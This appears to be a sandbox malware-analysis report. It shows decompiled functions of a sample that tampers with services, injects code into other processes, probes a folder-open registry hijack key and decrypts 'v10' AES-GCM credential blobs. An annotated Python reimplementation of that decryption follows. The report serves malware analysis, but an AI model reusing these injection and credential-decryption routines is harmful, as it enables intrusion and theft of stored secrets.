                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D3D9
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D3E6
                                  • GetLastError.KERNEL32 ref: 0040D3F0
                                  • Sleep.KERNEL32(000007D0), ref: 0040D402
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D40B
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D41F
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D422
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                  • String ID: ServicesActive
                                  • API String ID: 104619213-3071072050
                                  • Opcode ID: 3cebff5e58f89dfa7b23d4f060edef8f4579dac96d3e42af9f8a36863e90b399
                                  • Instruction ID: 984c0b14d8c5f8436b4892bcd3ae393994a7e81e733ff7ebf7d643affbd23cba
                                  • Opcode Fuzzy Hash: 3cebff5e58f89dfa7b23d4f060edef8f4579dac96d3e42af9f8a36863e90b399
                                  • Instruction Fuzzy Hash: 87014F35B083657BD6211BB6AC8CE9B3E7DDBC9B51B014076FA05E2290CA78980586B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E0040D8FB(intOrPtr __ecx) {
                                  				char _v8;
                                  				signed int _v12;
                                  				char _v16;
                                  				char _v20;
                                  				short* _v24;
                                  				signed int _v28;
                                  				short** _v32;
                                  				short* _v36;
                                  				signed int _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr* _t66;
                                  				char* _t69;
                                  				void* _t90;
                                  				intOrPtr* _t91;
                                  				intOrPtr _t92;
                                  				intOrPtr _t105;
                                  				intOrPtr* _t112;
                                  				intOrPtr _t113;
                                  				char _t114;
                                  				signed int _t115;
                                  				signed int _t116;
                                  				void* _t117;
                                  				void* _t119;
                                  
                                  				_t113 = __ecx;
                                  				_v44 = __ecx;
                                  				_v20 = 0;
                                  				_v16 = 0;
                                  				_v8 = 0;
                                  				_v24 = 0;
                                  				_v36 = 0;
                                  				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                  				if(_t90 == 0) {
                                  					L9:
                                  					_v40 = _v40 & 0x00000000;
                                  					L10:
                                  					E00405FEB(_v24);
                                  					return _v40;
                                  				}
                                  				_v40 = 1;
                                  				_v32 = _t113 + 0x28;
                                  				while(1) {
                                  					L2:
                                  					_v16 = 0;
                                  					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
                                  					_t114 = _v20;
                                  					_t66 = E00406045(_t114);
                                  					_t112 = _t66;
                                  					_t69 =  &_v20;
                                  					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
                                  					if(_t69 == 0 && GetLastError() != 0xea) {
                                  						goto L9;
                                  					}
                                  					CloseServiceHandle(_t90);
                                  					_t115 = 0;
                                  					if(_v8 <= 0) {
                                  						goto L9;
                                  					}
                                  					_t91 = _t112;
                                  					while( *_t91 != 0) {
                                  						E004036F7( &_v12,  *_t91);
                                  						if(E0040335A( &_v12, _v32) != 0) {
                                  							_t116 = _t115 * 0x2c;
                                  							E00403549( &_v24, E004036F7( &_v28,  *((intOrPtr*)(_t116 + _t112))));
                                  							E00405FEB(_v28);
                                  							_t92 = _v44;
                                  							_v28 = _v28 & 0x00000000;
                                  							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
                                  							E00405FEB(_v12);
                                  							_v12 = _v12 & 0x00000000;
                                  							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
                                  								_t105 = _v8;
                                  								_t117 = 0;
                                  								if(_t105 == 0) {
                                  									goto L10;
                                  								}
                                  								while( *_t112 != 0) {
                                  									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
                                  										L21:
                                  										_t117 = _t117 + 1;
                                  										_t112 = _t112 + 0x2c;
                                  										if(_t117 < _t105) {
                                  											continue;
                                  										}
                                  										goto L10;
                                  									}
                                  									E004036F7( &_v12,  *_t112);
                                  									if(lstrcmpW(_v12, _v24) != 0) {
                                  										E004036F7(_t119,  *_t112);
                                  										E0040221A(_t92 + 0x44,  &_v12);
                                  									}
                                  									E00405FEB(_v12);
                                  									_v12 = _v12 & 0x00000000;
                                  									_t105 = _v8;
                                  									goto L21;
                                  								}
                                  								goto L10;
                                  							}
                                  							if(_v36 == 1) {
                                  								goto L9;
                                  							}
                                  							E0040D33C(_v32, 2);
                                  							E0040D3A8(_v32);
                                  							_v36 = 1;
                                  							E00401099(_t112);
                                  							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                  							if(_t90 != 0) {
                                  								goto L2;
                                  							}
                                  							goto L9;
                                  						}
                                  						E00405FEB(_v12);
                                  						_v12 = _v12 & 0x00000000;
                                  						_t91 = _t91 + 0x2c;
                                  						_t115 = _t115 + 1;
                                  						if(_t115 < _v8) {
                                  							continue;
                                  						}
                                  						goto L9;
                                  					}
                                  					goto L9;
                                  				}
                                  				goto L9;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040D922
                                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040D959
                                    • Part of subcall function 00406045: GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 00406048
                                    • Part of subcall function 00406045: RtlAllocateHeap.NTDLL(00000000,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 0040604F
                                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040D982
                                  • GetLastError.KERNEL32 ref: 0040D98C
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D99A
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0040DA5B
                                  • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0040DA9E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                  • String ID: ServicesActive
                                  • API String ID: 899334174-3071072050
                                  • Opcode ID: aa88f2381a8379f9ef7fbe07b50d8f823752e6264afa939dd2859f9f5f34ee48
                                  • Instruction ID: 4627b5c660ce4a60c95ced9edd5d001cb4fcdfcb4ede8c399349bdd6508d6144
                                  • Opcode Fuzzy Hash: aa88f2381a8379f9ef7fbe07b50d8f823752e6264afa939dd2859f9f5f34ee48
                                  • Instruction Fuzzy Hash: 85511CB1D00219AFDB15DFE1C896BEFBBB8AF18305F10017AE502B62D1DB785A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00407D5E(void* __ecx, long __edx, long _a4) {
                                  				long _v8;
                                  				long _v12;
                                  				long _v16;
                                  				void* _v20;
                                  				void* _v24;
                                  				signed int _t17;
                                  				void* _t19;
                                  				void* _t22;
                                  				long _t32;
                                  				_Unknown_base(*)()* _t38;
                                  				void* _t40;
                                  
                                  				_t32 = __edx;
                                  				_v24 = __ecx;
                                  				if( *0x426754 == 0) {
                                  					 *0x426754 = E0040FB98() != 0;
                                  				}
                                  				_t17 = OpenProcess(0x1fffff, 0, _a4);
                                  				_t40 = _t17;
                                  				if(_t40 != 0) {
                                  					_t38 = VirtualAllocEx(_t40, 0, 0x100000, 0x3000, 0x40);
                                  					if(_t38 == 0) {
                                  						L12:
                                  						_push(0xfffffffe);
                                  						L13:
                                  						_pop(_t19);
                                  						L14:
                                  						return _t19;
                                  					}
                                  					_v16 = _v16 & 0x00000000;
                                  					VirtualProtectEx(_t40, _t38, 0x100000, 0x40,  &_v16);
                                  					_t22 = VirtualAllocEx(_t40, 0x33370000, 0x100, 0x3000, 0x40);
                                  					_v20 = _t22;
                                  					if(_t22 == 0) {
                                  						goto L12;
                                  					}
                                  					_v8 = _v8 & 0x00000000;
                                  					if(WriteProcessMemory(_t40, _v20, "XXXXXX", E00401133("XXXXXX"),  &_v8) == 0 || _v8 != E00401133("XXXXXX")) {
                                  						L11:
                                  						_push(0xfffffffd);
                                  						goto L13;
                                  					} else {
                                  						_v12 = _v12 & 0x00000000;
                                  						if(WriteProcessMemory(_t40, _t38, _v24, _t32,  &_v12) == 0 || _v12 != _t32) {
                                  							goto L11;
                                  						} else {
                                  							_t19 = CreateRemoteThread(_t40, 0, 0, _t38, 0, 0, 0);
                                  							goto L14;
                                  						}
                                  					}
                                  				} else {
                                  					return _t17 | 0xffffffff;
                                  				}
                                  			}

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 00407D8C
                                    • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                    • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                    • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 00407DB0
                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407DD1
                                  • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407DE9
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407E13
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407E3B
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407E53
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
                                  • String ID: XXXXXX
                                  • API String ID: 813767414-582547948
                                  • Opcode ID: b37eab9ef3b4ace79a3b066072094820bbd7040eabfb987d4398ce6d9e516cc8
                                  • Instruction ID: c495f5495fef9a669d461779a70b0afaaa39668d7629f65417ca4a490480110a
                                  • Opcode Fuzzy Hash: b37eab9ef3b4ace79a3b066072094820bbd7040eabfb987d4398ce6d9e516cc8
                                  • Instruction Fuzzy Hash: 26219371A49205BAEB2157A0DC05FBF7A7CAF44B55F2041B6FA10F11D0D7B8AE0086BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040955B(intOrPtr __ecx) {
                                  				char _v272;
                                  				struct _WIN32_FIND_DATAA _v592;
                                  				char _v856;
                                  				char _v1120;
                                  				intOrPtr _t31;
                                  				void* _t36;
                                  
                                  				_t31 = __ecx;
                                  				GetFullPathNameA(0x426760, 0x104,  &_v856, 0);
                                  				PathCombineA( &_v1120,  &_v856, "*");
                                  				_t36 = FindFirstFileA( &_v1120,  &_v592);
                                  				if(_t36 != 0xffffffff) {
                                  					do {
                                  						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
                                  							PathCombineA( &_v272, 0x426760,  &(_v592.cFileName));
                                  							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
                                  							E00409244(_t31,  &_v272);
                                  						}
                                  					} while (FindNextFileA(_t36,  &_v592) != 0);
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • GetFullPathNameA.KERNEL32(00426760,00000104,?,00000000), ref: 0040957C
                                  • PathCombineA.SHLWAPI(?,?,00418F18), ref: 0040959B
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004095AB
                                  • PathCombineA.SHLWAPI(?,00426760,0000002E), ref: 004095E2
                                  • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 004095F1
                                    • Part of subcall function 00409244: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                    • Part of subcall function 00409244: GetLastError.KERNEL32 ref: 0040926E
                                    • Part of subcall function 00409244: CloseHandle.KERNEL32(00000000), ref: 00409275
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00409609
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                  • String ID: .$Accounts\Account.rec0
                                  • API String ID: 3873318193-2526347284
                                  • Opcode ID: e3be3eae2ca6ed700056314c56cb9799dab408cb93910242309d82db515b9b61
                                  • Instruction ID: bc3515f8d3d8780f40bb8a30baa7d5921dca78d5fe5a5665ce25a30cdb5b99d6
                                  • Opcode Fuzzy Hash: e3be3eae2ca6ed700056314c56cb9799dab408cb93910242309d82db515b9b61
                                  • Instruction Fuzzy Hash: A71142B2A0022C6BDB20D7A4DC89FEB777CEB45714F5045E7E505E3181E7789E888E68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D33C(short** _a4, int _a8) {
                                  				void* _t3;
                                  				short* _t9;
                                  				void* _t12;
                                  				short* _t14;
                                  				void* _t16;
                                  
                                  				_t14 = 0;
                                  				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);          // SC_MANAGER_CONNECT to the active services database
                                  				_t16 = _t3;
                                  				if(_t16 != 0) {
                                  					_t12 = OpenServiceW(_t16,  *_a4, 2);                 // SERVICE_CHANGE_CONFIG on the service named by _a4
                                  					if(_t12 != 0) {
                                  						// 0xffffffff == SERVICE_NO_CHANGE for type and error control; only dwStartType is rewritten, to _a8
                                  						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
                                  							_t14 = 1;
                                  						}
                                  						CloseServiceHandle(_t16);
                                  						CloseServiceHandle(_t12);
                                  						_t9 = _t14;
                                  					} else {
                                  						CloseServiceHandle(_t16);
                                  						_t9 = 0;
                                  					}
                                  					return _t9;
                                  				}
                                  				return _t3;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D34B
                                  • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040D360
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D36D
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D386
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39A
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                  • String ID: ServicesActive
                                  • API String ID: 493672254-3071072050
                                  • Opcode ID: c4ce248089d705e5acf75914af0f3f1b1fac63e6aab84437131e5122b90e0dce
                                  • Instruction ID: 1675453761964aa3b76a2eaeb2c7b583256337f413fea86e2beca60fa8f39388
                                  • Opcode Fuzzy Hash: c4ce248089d705e5acf75914af0f3f1b1fac63e6aab84437131e5122b90e0dce
                                  • Instruction Fuzzy Hash: 3FF0FC3170432577C7211B76AC48EDB3F6CDBCA7707014232FA11E22D0CA74CC0586A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E004060B0() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                  				if(_t2 != 0) {
                                  					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
                                  				}
                                  				ExitProcess(1);
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004060B5
                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004060C1
                                  • ExitProcess.KERNEL32 ref: 004060E0
                                  Strings
                                  • USER32.DLL, xrefs: 004060B0
                                  • MessageBoxA, xrefs: 004060BB
                                  • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 004060D5
                                  • PureCall, xrefs: 004060D0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressExitLibraryLoadProcProcess
                                  • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                  • API String ID: 881411216-4134947204
                                  • Opcode ID: a4247d2b7bbfecdeea637224916adbd96540b56aef97e3bda7922722b43ed199
                                  • Instruction ID: bd81d5c7f3da7a5dda9c96caca806214e81eb27f708d7e513293adb5dabf46c5
                                  • Opcode Fuzzy Hash: a4247d2b7bbfecdeea637224916adbd96540b56aef97e3bda7922722b43ed199
                                  • Instruction Fuzzy Hash: 04D0C2303C83016AE6103BA0AD4EF9636355B04B51F244962B605A51D1DAE99592D56D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412E91() {
                                  				void* _v8;
                                  				int _v12;
                                  				int _v16;
                                  				struct _SECURITY_DESCRIPTOR* _v20;
                                  				struct _SECURITY_ATTRIBUTES _v24;
                                  				struct _SECURITY_DESCRIPTOR _v44;
                                  				long _t20;
                                  
                                  				// descriptor with a present but NULL DACL: every principal gets full access to the key
                                  				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
                                  					L5:
                                  					return 0;
                                  				} else {
                                  					_v24 = 0xc;                  // SECURITY_ATTRIBUTES.nLength
                                  					_v20 =  &_v44;               // lpSecurityDescriptor
                                  					_v16 = 0;                    // bInheritHandle
                                  					// HKEY_CURRENT_USER, samDesired 0x20006 == KEY_WRITE; this key is the per-user override of the folder "open" verb
                                  					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
                                  					if(_t20 != 0) {
                                  						SetLastError(_t20);
                                  						goto L5;
                                  					}
                                  					RegCloseKey(_v8);            // nothing is written here; the return value only reports that the key is writable
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412E9E
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412EB2
                                  • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,00413187,?), ref: 00412EEA
                                  • RegCloseKey.ADVAPI32(00413187), ref: 00412EF7
                                  • SetLastError.KERNEL32(00000000), ref: 00412F02
                                  Strings
                                  • Software\Classes\Folder\shell\open\command, xrefs: 00412EE0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                  • String ID: Software\Classes\Folder\shell\open\command
                                  • API String ID: 1473660444-2536721355
                                  • Opcode ID: f4a9b6598db950cac999bcfd18d51eb7d783ea20bfab151884b3b51fb57c84b6
                                  • Instruction ID: 82a2526e36d2d6463d42065251312d8bdf4d9f0b426d0c692092d159b657fe2b
                                  • Opcode Fuzzy Hash: f4a9b6598db950cac999bcfd18d51eb7d783ea20bfab151884b3b51fb57c84b6
                                  • Instruction Fuzzy Hash: C5011A71905228AADF209BA19D49FDFBFBDEF09750F004122FA05F2140D7B49685DAA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                  • BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                  • BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
                                  • String ID: AES$ChainingMode$ChainingModeGCM
                                  • API String ID: 1692524283-1213888626
                                  • Opcode ID: dcef71b3dcc6bd3a3947520fdd90713a2cd90525b873c444abc0fdd3c8c30a01
                                  • Instruction ID: c2b106cd844a06e10b1a571c349fc797866018eb450a69ea0d76d9719a4b7e57
                                  • Opcode Fuzzy Hash: dcef71b3dcc6bd3a3947520fdd90713a2cd90525b873c444abc0fdd3c8c30a01
                                  • Instruction Fuzzy Hash: 2FF06871345325BFDB240B56DC49ED7BFACEF5AB91B10413AF905E1150D6B15C00D6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E0040C6BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                  				char _v10;
                                  				char _v12;
                                  				long _v16;
                                  				char _v20;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				intOrPtr _v76;
                                  				intOrPtr _v80;
                                  				intOrPtr _v84;
                                  				int _v88;
                                  				void* _t36;
                                  				long _t50;
                                  				void* _t54;
                                  				int _t61;
                                  				void* _t63;
                                  				void* _t73;
                                  				void* _t74;
                                  				void* _t75;
                                  				void* _t76;
                                  				void* _t77;
                                  
                                  				_t63 = __ecx;
                                  				_t73 = __edx;
                                  				_v12 = 0x3176;               // "v1" (little-endian) ...
                                  				_v10 = 0x30;                 // ... "0": the 3-byte "v10" prefix compared below
                                  				_t75 = __ecx;                // __ecx: blob pointer, __edx: blob length
                                  				if(__edx < 3) {              // too short to carry the prefix: take the non-AES path
                                  					L8:
                                  					_push(_t63);
                                  					_push( &_v16);
                                  					_push( &_v20);
                                  					_t36 = E0040C1DD(_t75, _t73, __eflags);
                                  					__eflags = _t36;
                                  					if(_t36 != 0) {
                                  						_t76 = E00401085(_v16 + 1);
                                  						__eflags = _v16 + 1;
                                  						E00401052(_t76, 0, _v16 + 1);
                                  						E0040102C(_t76, _v20, _v16);
                                  						_push(_v20);
                                  						goto L10;
                                  					}
                                  				} else {
                                  					_t36 = E00401000(__ecx,  &_v12, 3);                  // compare first 3 bytes with "v10"
                                  					_t77 = _t77 + 0xc;
                                  					if(_t36 != 0) {
                                  						goto L8;                                          // no prefix: E0040C1DD path
                                  					} else {
                                  						if(_a4 != _t36 && _a8 != _t36) {
                                  							_t61 = 0x40;
                                  							E00401052( &_v88, _t36, _t61);                // zero a 0x40-byte BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
                                  							_t7 = _t75 + 3; // 0x3
                                  							_v88 = _t61;                                  // cbSize = 0x40
                                  							_v80 = _t7;                                   // pbNonce = blob + 3
                                  							_t10 = _t73 - 0x10; // -16
                                  							_v84 = 1;                                     // dwInfoVersion = 1
                                  							_v76 = 0xc;                                   // cbNonce = 12
                                  							_v64 = _t10 + _t75;                           // pbTag = blob + len - 16
                                  							_t14 = _t73 - 0x1f; // -31
                                  							_t50 = _t14;
                                  							_v60 = 0x10;                                  // cbTag = 16
                                  							_v16 = _t50;                                  // ciphertext length = len - (3 + 12 + 16)
                                  							_t36 = LocalAlloc(_t61, _t50);                // LPTR; no check that len >= 31, a short blob makes this fail
                                  							_t74 = _t36;
                                  							if(_t74 != 0) {
                                  								_t54 = _v80 + _v76;                       // ciphertext starts at blob + 15
                                  								__imp__BCryptDecrypt(_a8, _t54, _v16,  &_v88, 0, 0, _t74, _v16,  &_v16, 0);   // _a8: AES-GCM key handle, no AAD
                                  								if(_t54 != 0) {                           // NTSTATUS reused in _t54
                                  									return 0x418fe6;                      // static error string
                                  								}
                                  								_t76 = E00401085(_v16 + 1);               // heap buffer for plaintext + NUL (GetProcessHeap/RtlAllocateHeap)
                                  								E00401052(_t76, 0, _v16 + 1);
                                  								E0040102C(_t76, _t74, _v16);              // copy the decrypted bytes; _v16 now holds the output length
                                  								_push(_t74);
                                  								L10:
                                  								LocalFree();
                                  								return _t76;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t36;
                                  			}

                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                  • BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • LocalFree.KERNEL32(?), ref: 0040C7FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
                                  • String ID: 0$v1
                                  • API String ID: 4131498132-3331332043
                                  • Opcode ID: 0d7ad95d91672adb1202174cf130c5b7be13771ab2cb2749681f65612fe1e175
                                  • Instruction ID: 2970a0a6e6da2b46dc71b506d453e3d8838dace9638eca7dbf8707eb64b33263
                                  • Opcode Fuzzy Hash: 0d7ad95d91672adb1202174cf130c5b7be13771ab2cb2749681f65612fe1e175
                                  • Instruction Fuzzy Hash: 064160B2D00108BBDB01ABD5DC85EEFB7BCEF44344F14813BF911A2290E7389A458B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%
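As an added illustration (not code from the sandbox report or from the sample), the Python below models the blob handling E0040C6BD implies: the "v10" prefix test, the nonce/ciphertext/tag offsets the function loads into BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, the len - 31 plaintext size, and an AES-256-GCM decrypt with no associated data (the algorithm, chaining mode and 32-byte key come from the BCryptOpenAlgorithmProvider / ChainingModeGCM / BCryptGenerateSymmetricKey calls listed earlier in this section). The key is assumed to be supplied by the caller; the report does not show where the sample obtains it. The third-party cryptography package is an assumption and is optional, and the embedded test vector is constructed, not data from the sample.

```python
from typing import Optional, Tuple

V10_PREFIX = b"v10"          # the 0x3176 / 0x30 bytes the function compares against
NONCE_LEN = 12               # cbNonce = 0xc, nonce at blob + 3
TAG_LEN = 16                 # cbTag = 0x10, tag at blob + len - 16
OVERHEAD = len(V10_PREFIX) + NONCE_LEN + TAG_LEN   # 31 == the 0x1f subtracted from len


def classify_blob(blob: bytes) -> str:
    """Mirror the branch at the top of E0040C6BD: anything not exactly
    'v10'-prefixed (including blobs shorter than 3 bytes) goes to the
    non-AES path (E0040C1DD); 'v10' blobs go to BCryptDecrypt."""
    if len(blob) < 3 or blob[:3] != V10_PREFIX:
        return "dpapi"
    return "aes-gcm"


def split_v10_blob(blob: bytes) -> Tuple[bytes, bytes, bytes]:
    """Return (nonce, ciphertext, tag) using the decompiled offsets.
    The decompiled code computes len - 0x1f with no lower-bound check and
    hands it to LocalAlloc; here a short blob is rejected explicitly."""
    if classify_blob(blob) != "aes-gcm":
        raise ValueError("not a v10 blob")
    if len(blob) < OVERHEAD:
        raise ValueError("v10 blob shorter than prefix + nonce + tag")
    nonce = blob[3:3 + NONCE_LEN]
    tag = blob[len(blob) - TAG_LEN:]
    ciphertext = blob[3 + NONCE_LEN:len(blob) - TAG_LEN]   # length == len - 31
    return nonce, ciphertext, tag


def decrypt_v10(blob: bytes, key: bytes) -> Optional[bytes]:
    """AES-256-GCM decrypt with no AAD (pbAuthData stays NULL in the zeroed
    struct). Uses the third-party 'cryptography' package when installed
    (assumption); returns None when it is not, so the parsing still runs."""
    if len(key) != 32:
        raise ValueError("expected a 32-byte AES-256 key")
    nonce, ciphertext, tag = split_v10_blob(blob)
    try:
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    except ImportError:
        return None
    # AESGCM wants ciphertext || tag, which is how the blob already lays them out
    return AESGCM(key).decrypt(nonce, ciphertext + tag, None)


# Constructed input: the standard GCM test vector with an all-zero 256-bit key,
# all-zero 96-bit nonce and one all-zero plaintext block, wrapped in "v10" framing.
SAMPLE_KEY = bytes(32)
SAMPLE_BLOB = (
    V10_PREFIX
    + bytes(NONCE_LEN)
    + bytes.fromhex("cea7403d4d606b6e074ec5d3baf39d18")   # ciphertext
    + bytes.fromhex("d0d1c8a799996bf0265b98b5d48ab919")   # tag
)

if __name__ == "__main__":
    print(classify_blob(SAMPLE_BLOB), split_v10_blob(SAMPLE_BLOB))
    print(decrypt_v10(SAMPLE_BLOB, SAMPLE_KEY))
```

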